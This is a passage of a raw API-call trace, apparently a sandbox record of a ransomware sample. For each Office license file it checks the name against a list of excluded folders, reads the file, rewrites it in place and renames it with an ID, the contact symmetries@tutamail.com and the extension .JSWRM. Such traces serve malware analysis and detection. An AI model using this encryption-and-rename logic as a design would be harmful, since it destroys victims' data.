lpMultiByteStr="MondoR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0104.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.050] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11574) returned 1 [0104.050] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0104.050] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0104.057] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.057] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0104.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.057] CloseHandle (hObject=0x45c) returned 1 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0104.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0104.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0104.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0104.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.057] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0104.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0104.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.058] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ddeb2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ddeb2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4f82560, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Retail-ul-phn.xrm-ms", cAlternateFileName="MO39E0~1.XRM")) returned 1 [0104.088] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0104.088] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0104.088] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0104.088] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0104.089] lstrcmpiW (lpString1="MondoR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241330, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Retail-ul-phn.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0104.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0104.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.090] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19919) returned 1 [0104.090] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dc0) returned 0x24c1d0 [0104.090] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dc0, lpOverlapped=0x0) returned 1 [0104.094] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.094] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dc0, lpOverlapped=0x0) returned 1 [0104.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.094] CloseHandle (hObject=0x45c) returned 1 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0104.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0104.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0104.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.094] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0104.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0104.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0104.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0104.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0104.096] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4c3b14f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4c3b14f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4d925e9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b9f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription-pl.xrm-ms", cAlternateFileName="MOE06D~1.XRM")) returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.096] lstrcmpiW (lpString1="MondoR_Subscription-pl.xrm-ms", lpString2="msocache") returned -1 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0104.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.097] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11167) returned 1 [0104.097] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0104.097] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0104.099] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.099] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0104.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.099] CloseHandle (hObject=0x45c) returned 1 [0104.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0104.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0104.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0104.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0104.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.100] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0104.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0104.101] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4d461ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4d461ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4e511f7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7e69, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription-ppd.xrm-ms", cAlternateFileName="MO3CDC~1.XRM")) returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.101] lstrcmpiW (lpString1="MondoR_Subscription-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0104.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 